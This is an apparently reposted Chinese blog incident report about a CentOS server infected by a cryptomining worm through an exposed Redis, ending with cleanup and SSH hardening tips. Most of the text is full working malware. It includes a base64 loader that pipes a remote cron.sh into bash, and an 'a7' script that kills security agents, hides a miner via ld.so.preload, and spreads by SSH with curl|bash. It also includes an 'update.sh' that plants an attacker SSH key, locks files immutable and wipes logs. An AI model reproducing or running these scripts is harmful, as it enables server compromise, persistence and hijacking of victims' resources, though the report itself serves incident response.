centos病毒

#!/bin/bash
exec &>/dev/null
{echo,ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4Kc2xlZXAgJCg
oUkFORE9NICUgNjAwKSkKKHdnZXQgLXFVLSAtTy0gLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSByYXBpZDdjcGZxbnd4b2RvLnRvcjJ3ZWIuaW8vY3Jvbi5zaCB8fCBjdXJsIC1mc1NMa0EtIHJh
cGlkN2NwZnFud3hvZG8udG9yMndlYi5pby9jcm9uLnNoIHx8IHdnZXQgLXFVLSAtTy0gLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSByYXBpZDdjcGZxbnd4b2RvLnRvcjJ3ZWIuZnlpL2Nyb24uc
2ggfHwgY3VybCAtZnNTTGtBLSByYXBpZDdjcGZxbnd4b2RvLnRvcjJ3ZWIuZnlpL2Nyb24uc2ggfHwgd2dldCAtcVUtIC1PLSAtLW5vLWNoZWNrLWNlcnRpZmljYXRlIHJhcGlkN2NwZnFud3
hvZG8ub25pb24uc2gvY3Jvbi5zaCB8fCBjdXJsIC1mc1NMa0EtIHJhcGlkN2NwZnFud3hvZG8ub25pb24uc2gvY3Jvbi5zaCApfGJhc2gK}|{base64,-d}|bash

 事件回顾:阿里云服务器中毒了,接到短信通知

事件说明:云盾基于大数据机器学习检测引擎,检测到您的服务器正在尝试访问一个可疑Host URL,产生该告警的原因可能是该URL很少见; 该指令历史上没被执行过; 或者该URL和恶意软件相关等原因。
        检测到服务器上Redis漏洞被黑客利用向磁盘上写入了可疑文件,可能导致黑客直接获取ECS的Root权限。请及时修复Redis配置漏洞
解决方案:请及时排查告警中提示的恶意URL,以及所下载的目录下的恶意文件。并及时清理已运行的恶意进程。
       按照下列链接进行redis配置漏洞的修复 https://help.aliyun.com/knowledge_detail/37447.html。 https://help.aliyun.com/knowledge_detail/37433.html。 同时删除告警详情中被恶意写入的ssh key文件,防止被黑客重复2次入侵。
渗透命令:/bin/sh -c curl -o- http://121.41.24.142/a7 | bash >/dev/null 2>&1 || true
参考链接:https://blog.netlab.360.com/systemdminer-propagation-through-ddg/
 
其中http://121.41.24.142/a7文件内容如下,供大家参考:
  1 #/bin/bash
  2 if [ -f /tmp/.a10 ]; then
  3   exit 101
  4 fi
  5 touch /tmp/.a10
  6 function clean () {
  7   rm -f /tmp/.a10
  8 }
  9 
 10 for f in /var/spool/cron/* /var/spool/cron/crontabs/* /etc/*crontab /etc/cron.d/*; do 
 11   if grep -i -q redis "$f"; then echo > "$f"; fi
 12 done
 13 
 14 if [ -f /etc/ld.so.preload ]; then
 15   mv -f /etc/ld.so.preload /etc/ld.so.pre
 16 fi
 17 chmod -x /etc/xig
 18 chmod -x /root/cranberry /tmp/cranberry /root/yam
 19 chmod -x /etc/root.sh
 20 chmod -x /usr/bin/gpg-agentd
 21 chmod -x /usr/bin/kworker
 22 chmod -x /usr/local/bin/gpg-agentd
 23 killall -9 xig
 24 killall -9 cranberry
 25 killall -9 root.sh
 26 killall -9 gpg-agentd
 27 killall -9 .gpg-agent
 28 killall -9 xmr-stak
 29 killall -9 kworker
 30 killall -9 .gpg
 31 killall -9 pnscan
 32 killall -9 netfs
 33 killall -9 geth
 34 pkill -f stratum
 35 pkill -f nativesvc
 36 pkill -f cryptonight
 37 pkill -f minerd
 38 pkill -f conn.sh
 39 pkill -f /opt/yilu/
 40 pkill -f /tmp/
 41 pkill -f .cmd
 42 pkill -f kworker
 43 if grep monero7 /etc/x7/pools.txt; then
 44   killall x7
 45   rm -rf /etc/x7
 46 fi
 47 running=
 48 killall x7
 49 #if ps aux | grep '[b]in/x7'; then
 50 #  running=1
 51 #fi
 52 if [ -f /etc/ld.so.pre ]; then
 53   mv -f /etc/ld.so.pre /etc/ld.so.preload
 54 fi
 55 if ! /sbin/iptables -n -L | grep -q 165.225.157.157; then
 56   iptables -A INPUT -s 165.225.157.157 -j DROP
 57   iptables -A OUTPUT -d 165.225.157.157 -j DROP
 58 fi
 59 while read h; do 
 60 if ! grep -q "$h" /etc/hosts; then
 61   echo "$h" >> /etc/hosts
 62 fi
 63 done < <(echo '
 64 0.0.0.0 transfer.sh
 65 0.0.0.0 static.cortins.tk
 66 0.0.0.0 xcn1.yiluzhuanqian.com
 67 0.0.0.0 www.yiluzhuanqian.com
 68 0.0.0.0 xmr.yiluzhuanqian.com
 69 0.0.0.0 xmr.f2pool.com
 70 0.0.0.0 stratum.f2pool.com
 71 0.0.0.0 xmr.crypto-pool.fr
 72 0.0.0.0 jw-js1.ppxxmr.com
 73 0.0.0.0 fr.minexmr.com
 74 0.0.0.0 pool.minexmr.com
 75 0.0.0.0 img.namunil.com
 76 0.0.0.0 cdn.namunil.com
 77 0.0.0.0 chrome.zer0day.ru
 78 0.0.0.0 pool.t00ls.ru
 79 0.0.0.0 monerohash.com
 80 0.0.0.0 z.chakpools.com
 81 ')
 82 if [[ "$running" -eq "1" ]]; then
 83   clean
 84   exit 0
 85 fi
 86 
 87 os=$(egrep -i 'debian|ubuntu|cent' -o -- /etc/issue)
 88 os="${os,,}"
 89 if [ -z "$os" ] && type yum; then os='cent'; fi
 90 if ! grep -q 8.8.8.8 /etc/resolv.conf; then
 91   echo nameserver 8.8.8.8 >> /etc/resolv.conf
 92 fi
 93 if ! grep -q 1.1.1.1 /etc/resolv.conf; then
 94   echo nameserver 1.1.1.1 >> /etc/resolv.conf
 95 fi
 96 
 97 if [ "$os" = 'cent' ]; then
 98   yum install -y at unzip wget bzip2 hwloc-devel openssl openssl-devel
 99 else
100   apt-get update
101   apt-get install -y at unzip wget hwloc
102 fi
103 
104 if ps aux | grep -i '[a]liyun'; then
105     wget http://update.aegis.aliyun.com/download/uninstall.sh
106     chmod +x uninstall.sh
107     ./uninstall.sh
108     wget http://update.aegis.aliyun.com/download/quartz_uninstall.sh
109     chmod +x quartz_uninstall.sh
110     ./quartz_uninstall.sh
111     rm -f uninstall.sh quartz_uninstall.sh
112     pkill aliyun-service
113     rm -fr /etc/init.d/agentwatch /usr/sbin/aliyun-service
114     rm -rf /usr/local/aegis*;
115 elif ps aux | grep -i '[y]unjing'; then
116     /usr/local/qcloud/stargate/admin/uninstall.sh
117     /usr/local/qcloud/YunJing/uninst.sh
118     /usr/local/qcloud/monitor/barad/admin/uninstall.sh
119 fi
120 
121 cd /etc; wget --no-check-certificate http://121.41.24.142/${os}.tar.gz -O x7.tar.gz; tar -xvf x7.tar.gz && rm -f x7.tar.gz
122 /sbin/sysctl -w vm.nr_hugepages=128
123 chown -R root:root /etc/x7
124 (cd /etc/x7; nohup nice bin/x7 &)
125 
126 if [ -f /etc/rc.sysinit ]; then
127   if ! grep x7 /etc/rc.sysinit; then sed -i '35i(cd /etc/x7; nohup nice bin/x7 &)' /etc/rc.sysinit; fi
128 elif [ -f /etc/rc.d/init.d/network ]; then
129   if ! grep x7 /etc/rc.d/init.d/network; then sed -i '64i(cd /etc/x7; nohup nice bin/x7 &)' /etc/rc.d/init.d/network; fi
130 elif [ -f /etc/init.d/networking ]; then
131   if ! grep x7 /etc/init.d/networking; then sed -i '130i(cd /etc/x7; nohup nice bin/x7 &)' /etc/init.d/networking; fi
132 fi
133 
134 wget --no-check-certificate https://github.com/gianlucaborello/libprocesshider/archive/master.zip -O master.zip && unzip master.zip && rm -f master.zip && cd libprocesshider-master;
135 sed -i 's/evil_script.py/x7/' processhider.c
136 make && mv libprocesshider.so /usr/local/lib/libjdk.so && echo /usr/local/lib/libjdk.so >> /etc/ld.so.preload && cd .. && rm -rf libprocesshider-master
137 
138 if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
139   for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o-  http://112.74.182.220/a7 | bash >/dev/null 2>&1 &' & done
140 fi
141 
142 touch -r /etc/sudoers /etc/x7 /etc/ld.so.preload /etc/hosts
143 echo "echo | tee /var/log/cron /var/spool/mail/root /var/mail/root" | at now + 1 minutes
144 
145 clean
146 history -c
147 exit 0

 

 

 http://43.245.222.57:8667/6hqjb0spqqbfbhjd/update.sh

  1 #!/bin/sh
  2 setenforce 0 2>dev/null
  3 echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
  4 sync && echo 3 >/proc/sys/vm/drop_caches
  5 crondir='/var/spool/cron/'"$USER"
  6 cont=`cat ${crondir}`
  7 ssht=`cat /root/.ssh/authorized_keys`
  8 echo 1 > /etc/sysupdates
  9 rtdir="/etc/sysupdates"
 10 bbdir="/usr/bin/curl"
 11 bbdira="/usr/bin/url"
 12 ccdir="/usr/bin/wget"
 13 ccdira="/usr/bin/get"
 14 mv /usr/bin/wget /usr/bin/get
 15 mv /usr/bin/curl /usr/bin/url
 16 miner_url="https://pixeldrain.com/api/file/3myaXqqZ"
 17 miner_url_backup="http://43.245.222.57:8667/6HqJB0SPQqbFbHJD/sysupdate"
 18 miner_size="854364"
 19 sh_url="http://43.245.222.57:8667/6HqJB0SPQqbFbHJD/update.sh"
 20 sh_url_backup="http://43.245.222.57:8667/6HqJB0SPQqbFbHJD/update.sh"
 21 config_url="http://43.245.222.57:8667/6HqJB0SPQqbFbHJD/config.json"
 22 config_url_backup="http://43.245.222.57:8667/6HqJB0SPQqbFbHJD/config.json"
 23 config_size="3300"
 24 scan_url="https://pixeldrain.com/api/file/aQWIprw_"
 25 scan_url_backup="http://43.245.222.57:8667/6HqJB0SPQqbFbHJD/networkservice"
 26 scan_size="2209848"
 27 watchdog_url="https://pixeldrain.com/api/file/o4m-DmH6"
 28 watchdog_url_backup="http://43.245.222.57:8667/6HqJB0SPQqbFbHJD/sysguard"
 29 watchdog_size="1644848"
 30 
 31 kill_miner_proc()
 32 {
 33     ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
 34     ps auxf|grep -v grep|grep "pool.t00ls.ru"|awk '{print $2}'|xargs kill -9
 35     ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
 36     ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
 37     ps auxf|grep -v grep|grep "[email protected]"|awk '{print $2}'|xargs kill -9
 38     ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
 39     ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
 40     ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
 41     ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
 42     ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
 43     ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
 44     ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
 45     ps auxf|grep xiaoyao| awk '{print $2}'|xargs kill -9
 46     ps auxf|grep xiaoxue| awk '{print $2}'|xargs kill -9
 47     ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9
 48     ps ax|grep -o './[0-9]* -c'| xargs pkill -f
 49     pkill -f biosetjenkins
 50     pkill -f Loopback
 51     pkill -f apaceha
 52     pkill -f cryptonight
 53     pkill -f stratum
 54     pkill -f mixnerdx
 55     pkill -f performedl
 56     pkill -f JnKihGjn
 57     pkill -f irqba2anc1
 58     pkill -f irqba5xnc1
 59     pkill -f irqbnc1
 60     pkill -f ir29xc1
 61     pkill -f conns
 62     pkill -f irqbalance
 63     pkill -f crypto-pool
 64     pkill -f minexmr
 65     pkill -f XJnRj
 66     pkill -f mgwsl
 67     pkill -f pythno
 68     pkill -f jweri
 69     pkill -f lx26
 70     pkill -f NXLAi
 71     pkill -f BI5zj
 72     pkill -f askdljlqw
 73     pkill -f minerd
 74     pkill -f minergate
 75     pkill -f Guard.sh
 76     pkill -f ysaydh
 77     pkill -f bonns
 78     pkill -f donns
 79     pkill -f kxjd
 80     pkill -f Duck.sh
 81     pkill -f bonn.sh
 82     pkill -f conn.sh
 83     pkill -f kworker34
 84     pkill -f kw.sh
 85     pkill -f pro.sh
 86     pkill -f polkitd
 87     pkill -f acpid
 88     pkill -f icb5o
 89     pkill -f nopxi
 90     pkill -f irqbalanc1
 91     pkill -f minerd
 92     pkill -f i586
 93     pkill -f gddr
 94     pkill -f mstxmr
 95     pkill -f ddg.2011
 96     pkill -f wnTKYg
 97     pkill -f deamon
 98     pkill -f disk_genius
 99     pkill -f sourplum
100     pkill -f polkitd
101     pkill -f nanoWatch
102     pkill -f zigw
103     pkill -f devtool
104     pkill -f systemctI
105     pkill -f WmiPrwSe
106     crontab -r
107     rm -rf /var/spool/cron/*
108 }
109 downloads()
110 {
111     if [ -f "/usr/bin/curl" ]
112     then 
113     echo $1,$2
114         http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1`
115         if [ "$http_code" -eq "200" ]
116         then
117             curl --connect-timeout 10 --retry 100 $1 > $2
118         elif [ "$http_code" -eq "405" ]
119         then
120             curl --connect-timeout 10 --retry 100 $1 > $2
121         else
122             curl --connect-timeout 10 --retry 100 $3 > $2
123         fi
124     elif [ -f "/usr/bin/url" ]
125     then
126         http_code = `url -I -m 10 -o /dev/null -s -w %{http_code} $1`
127         if [ "$http_code" -eq "200" ]
128         then
129             url --connect-timeout 10 --retry 100 $1 > $2
130         elif [ "$http_code" -eq "405" ]
131         then
132             url --connect-timeout 10 --retry 100 $1 > $2
133         else
134             url --connect-timeout 10 --retry 100 $3 > $2
135         fi
136     elif [ -f "/usr/bin/wget" ]
137     then
138         wget --timeout=10 --tries=100 -O $2 $1
139         if [ $? -ne 0 ]
140     then
141         wget --timeout=10 --tries=100 -O $2 $3
142         fi
143     elif [ -f "/usr/bin/get" ]
144     then
145         get --timeout=10 --tries=100 -O $2 $1
146         if [ $? -eq 0 ]
147         then
148             get --timeout=10 --tries=100 -O $2 $3
149         fi
150     fi
151 }
152 
153 kill_sus_proc()
154 {
155     ps axf -o "pid"|while read procid
156     do
157             ls -l /proc/$procid/exe | grep /tmp
158             if [ $? -ne 1 ]
159             then
160                     cat /proc/$procid/cmdline| grep -a -E "sysguard|update.sh|sysupdate|networkservice"
161                     if [ $? -ne 0 ]
162                     then
163                             kill -9 $procid
164                     else
165                             echo "don't kill"
166                     fi
167             fi
168     done
169     ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid
170     do
171             cat /proc/$procid/cmdline| grep -a -E "sysguard|update.sh|sysupdate|networkservice"
172             if [ $? -ne 0 ]
173             then
174                     kill -9 $procid
175             else
176                     echo "don't kill"
177             fi
178     done
179 }
180 
181 kill_miner_proc
182 kill_sus_proc
183 
184 if [ -f "$rtdir" ]
185 then
186         echo "i am root"
187         echo "goto 1" >> /etc/sysupdate
188         chattr -i /etc/sysupdate*
189         chattr -i /etc/config.json*
190         chattr -i /etc/update.sh*
191         chattr -i /root/.ssh/authorized_keys*
192         chattr -i /etc/networkservice
193     if [ ! -f "/usr/bin/crontab" ]
194         then 
195             echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1" >> ${crondir}
196         else
197             [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab -
198     fi
199         chmod 700 /root/.ssh/
200         echo >> /root/.ssh/authorized_keys
201         chmod 600 root/.ssh/authorized_keys
202         echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPK+J+AIJvoCX67fFzfbNU5MT816KDmggltbgEI0hKZRdmMMe1ao/3CEgIzeqGbTff1suT/F1POUjGrf5t/ZqyIJzCIBKqNsxzM4tRNxrIGrqKnZypRlXdX+uZNaxmNJZGkkmtdeseekped0WnWk5SsvbYghBn4y9lZnsO+C1EgjLNWkbRPuoo/RkWTIXDmB7M7UcfYf+sSpApACt8DRydSEkeY709WtL0aANnN057Wnp/Okv+buM4mnkuteLtZvCAySt7PVBrCKyhItZx9VX/TMegljt/UPDaKfAeWF14Q1ORLRQkzZt9k+pY/ccNNbS53OmG0NhQ/awchmgXUpsP [email protected]" >> /root/.ssh/authorized_keys
203         
204     
205         cfg="/etc/config.json"
206         file="/etc/sysupdate"
207 
208     if [-f "/etc/config.json" ]
209     then
210         filesize_config=`ls -l /etc/config.json | awk '{ print $5 }'`
211         if [ "$filesize_config" -ne "$config_size" ]    
212         then
213             pkill -f sysupdate
214             rm /etc/config.json
215             downloads $config_url /etc/config.json $config_url_backup
216         else
217             echo "no need download"
218         fi
219     else
220         downloads $config_url /etc/config.json $config_url_backup
221     fi
222     
223     if [ -f "/etc/sysupdate" ]
224     then
225             filesize1=`ls -l /etc/sysupdate | awk '{ print $5 }'`
226             if [ "$filesize1" -ne "$miner_size" ] 
227             then
228                 pkill -f sysupdate
229                 rm /etc/sysupdate
230                 downloads $miner_url /etc/sysupdate $miner_url_backup
231             else
232                 echo "not need download"
233             fi
234     else
235             downloads $miner_url /etc/sysupdate $miner_url_backup
236     fi
237     
238     if [ -f "/etc/sysguard" ]
239     then
240             filesize1=`ls -l /etc/sysguard | awk '{ print $5 }'`
241             if [ "$filesize1" -ne "$watchdog_size" ] 
242             then
243                 pkill -f sysguard
244                 rm /etc/sysguard
245                 downloads $watchdog_url /etc/sysguard $watchdog_url_backup
246             else
247                 echo "not need download"
248             fi
249     else
250             downloads $watchdog_url /etc/sysguard $watchdog_url_backup
251     fi
252 
253     downloads $sh_url /etc/update.sh $sh_url_backup
254 
255     if [ -f "/etc/networkservice" ]
256     then
257             filesize2=`ls -l /etc/networkservice | awk '{ print $5 }'`
258             if [ "$filesize2" -ne "$scan_size" ] 
259             then
260                 pkill -f networkservice
261                 rm /etc/networkservice
262                 downloads  $scan_url /etc/networkservice $scan_url_backup
263             else
264                 echo "not need download"
265             fi
266     else
267             downloads $scan_url /etc/networkservice $scan_url_backup
268     fi
269 
270     chmod 777 /etc/sysupdate
271     ps -fe|grep sysupdate |grep -v grep
272     if [ $? -ne 0 ]
273     then
274                 cd /etc
275                 echo "not root runing"
276                 sleep 5s
277                 ./sysupdate &
278     else
279                 echo "root runing....."
280     fi
281     chmod 777 /etc/networkservice
282     ps -fe|grep networkservice |grep -v grep
283     if [ $? -ne 0 ]
284     then
285                 cd /etc
286                 echo "not roots runing"
287                 sleep 5s
288                 ./networkservice &
289     else
290                 echo "roots runing....."
291     fi
292     chmod 777 /etc/sysguard
293     ps -fe|grep sysguard |grep -v grep
294         if [ $? -ne 0 ]
295             then
296                 echo "not tmps runing"
297                 cd /etc
298                 chmod 777 sysguard
299                 sleep 5s
300                 ./sysguard &
301             else
302                 echo "roots runing....."
303         fi
304 
305 
306     chmod 777 /etc/sysupdate
307     chattr +i /etc/sysupdate
308     chmod 777 /etc/networkservice
309     chattr +i /etc/networkservice
310     chmod 777 /etc/config.json
311     chattr +i /etc/config.json
312     chmod 777 /etc/update.sh
313     chattr +i /etc/update.sh
314     chmod 777 /root/.ssh/authorized_keys
315     chattr +i /root/.ssh/authorized_keys
316 else
317     echo "goto 1" > /tmp/sysupdates
318     chattr -i /tmp/sysupdate*
319     chattr -i /tmp/networkservice
320     chattr -i /tmp/config.json*
321     chattr -i /tmp/update.sh*
322         
323     if [ ! -f "/usr/bin/crontab" ]
324     then 
325             echo "*/30 * * * * sh /tmp/update.sh >/dev/null 2>&1" >> ${crondir}
326     else
327             [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /tmp/update.sh >/dev/null 2>&1") | crontab -
328     fi
329 
330     if [ -f "/tmp/config.json" ]
331     then
332         filesize1=`ls -l /tmp/config.json | awk '{ print $5 }'`
333         if [ "$filesize1" -ne "$config_size" ]
334         then
335             pkill -f sysupdate
336             rm /tmp/config.json
337             downloads  $config_url /tmp/config.json $config_url_backup
338         else
339             echo "no need download"
340         fi
341     else
342         downloads $config_url /tmp/config.json $config_url_backup
343     fi
344 
345     if [ -f "/tmp/sysupdate" ]
346     then    
347         filesize1=`ls -l /tmp/sysupdate | awk '{ print $5 }'`
348         if [ "$filesize1" -ne "$miner_size" ] 
349         then
350                 pkill -f sysupdate
351                 rm /tmp/sysupdate
352                 downloads $miner_url /tmp/sysupdate $miner_url_backup
353         else
354                 echo "no need download"
355         fi
356     else
357             downloads $miner_url /tmp/sysupdate $miner_url_backup
358     fi
359 
360     if [ -f "/tmp/sysguard" ]
361     then
362             filesize1=`ls -l /tmp/sysguard | awk '{ print $5 }'`
363             if [ "$filesize1" -ne "$watchdog_size" ] 
364             then
365                 pkill -f sysguard
366                 rm /tmp/sysguard
367                 downloads $watchdog_url /tmp/sysguard $watchdog_url_backup
368             else
369                 echo "not need download"
370             fi
371     else
372             downloads $watchdog_url /tmp/sysguard $watchdog_url_backup
373     fi
374 
375     echo "i am here"
376     downloads $sh_url /tmp/update.sh $sh_url_backup
377 
378     if [ -f "/tmp/networkservice" ]
379     then 
380         filesize2=`ls -l /tmp/networkservice | awk '{ print $5 }'`
381         if [ "$filesize2" -ne "$scan_size" ]  
382         then
383                 pkill -f networkservice
384                 rm /tmp/networkservice
385                 downloads $scan_url /tmp/networkservice $scan_url_backup
386         else
387                 echo "no need download"
388         fi
389     else
390             downloads $scan_url /tmp/networkservice $scan_url_backup
391     fi
392 
393     ps -fe|grep sysupdate |grep -v grep
394         if [ $? -ne 0 ]
395             then
396                 echo "not tmp runing"
397                 cd /tmp
398                 chmod 777 sysupdate
399                 sleep 5s
400                 ./sysupdate &
401             else
402                 echo "tmp runing....."
403         fi
404     ps -fe|grep networkservice |grep -v grep
405         if [ $? -ne 0 ]
406             then
407                 echo "not tmps runing"
408                 cd /tmp
409                 chmod 777 networkservice
410                 sleep 5s
411                 ./networkservice &
412             else
413                 echo "tmps runing....."
414         fi
415 
416     ps -fe|grep sysguard |grep -v grep
417         if [ $? -ne 0 ]
418             then
419                 echo "not tmps runing"
420                 cd /tmp
421                 chmod 777 sysguard
422                 sleep 5s
423                 ./sysguard &
424             else
425                 echo "tmps runing....."
426         fi
427 
428     chmod 777 /tmp/sysupdate
429     chattr +i /tmp/sysupdate
430     chmod 777 /tmp/networkservice
431     chattr +i /tmp/networkservice
432     chmod 777 /tmp/sysguard
433     chattr +i /tmp/sysguard
434     chmod 777 /tmp/update.sh
435     chattr +i /tmp/update.sh
436     chmod 777 /tmp/config.json
437     chattr +i /tmp/config.json
438         
439 fi
440 iptables -F
441 iptables -X
442 iptables -A OUTPUT -p tcp --dport 3333 -j DROP
443 iptables -A OUTPUT -p tcp --dport 5555 -j DROP
444 iptables -A OUTPUT -p tcp --dport 7777 -j DROP
445 iptables -A OUTPUT -p tcp --dport 9999 -j DROP
446 service iptables reload
447 ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
448 history -c
449 echo > /var/spool/mail/root
450 echo > /var/log/wtmp
451 echo > /var/log/secure
452 echo > /root/.bash_history

 

服务器现象:服务器CPU突增,且.ssh/authorized_keys被写入恶意信息,文件也被加上了特殊权限i,禁止root权限删除该文件

centos病毒_第1张图片

 

 解决:修复redis漏洞,取消i权限并清空authorized_keys文件,删除异常定时任务,异常进程,关闭redis外网端口,对/etc/passwd   /etc/sshd/sshd_config加上i权限。

 

异常复现:

1、准备好网站和脚本

配置nginx 和待测试文件

centos病毒_第2张图片

 

2、测试执行

curl -fsSL 47.*。*。*/roll12dw | sh

centos病毒_第3张图片

 

3、准备好测试redis

4、登录redis并配置

centos病毒_第4张图片

以上两条命令意味着,以后redis所有数据都会保存在/var/spool/cron/root文件中。而这个文件就是root用户的定时任务配置文件。系统会执行该文件定义的定时任务。

写入定时任务然后保存即可

 

 

 

附:Linux基本的安全加固

1、修改/etc/ssh/sshd_config   禁止root直接访问并修改ssh端口

2、编辑 /etc/ssh/sshd_config 文件以按如下方式设置参数(取消注释): LogLevel INFO    ,以确保SSH LogLevel设置为INFO,记录登录和注销活动

3、设置SSH空闲超时退出时间,可降低未授权用户访问其他用户ssh会话的风险:编辑/etc/ssh/sshd_config,将ClientAliveInterval 设置为300到900,即5-15分钟,将ClientAliveCountMax设置为0-3。

4、编辑 /etc/ssh/sshd_config 文件以按如下方式设置参数: Protocol 2  ,此配置使SSHD强制使用V2安全协议

5、在/etc/ssh/sshd_config中取消MaxAuthTries注释符号#,设置最大密码尝试失败次数3-6,建议为4:MaxAuthTries 4,较低的Max AuthTrimes参数将降低SSH服务器被暴力攻击成功的风险。

6、设置密码修改最小间隔时间,限制密码更改过于频繁,在 /etc/login.defs 中将 PASS_MIN_DAYS 参数设置为7-14之间,建议为7: PASS_MIN_DAYS 7 需同时执行命令为root用户设置: chage --mindays 7 root

7、在/etc/pam.d/password-auth和/etc/pam.d/system-auth中password sufficient pam_unix.so 这行的末尾配置remember参数为5-24之间,原来的内容不用更改, 只在末尾加了remember=5。

    这样可以强制用户不重用最近使用的密码,降低密码猜测攻击风险

8、设置密码失效时间,强制定期修改密码,使用非密码登陆方式如密钥对,请忽略此项。在 /etc/login.defs 中将 PASS_MAX_DAYS 参数设置为 60-180之间,如 PASS_MAX_DAYS 90。需同时执行命令设置root密码失效时间: chage --maxdays 90 root。

9、设置密码复杂度,编辑/etc/security/pwquality.conf,把minlen(密码最小长度)设置为9-32位,把minclass(至少包含小写字母、大写字母、数字、特殊字符等4类字符中等3类或4类)设置为3或4。如: minlen=10 minclass=3

 

转载于:https://www.cnblogs.com/abkn/p/10650355.html

你可能感兴趣的:(centos病毒)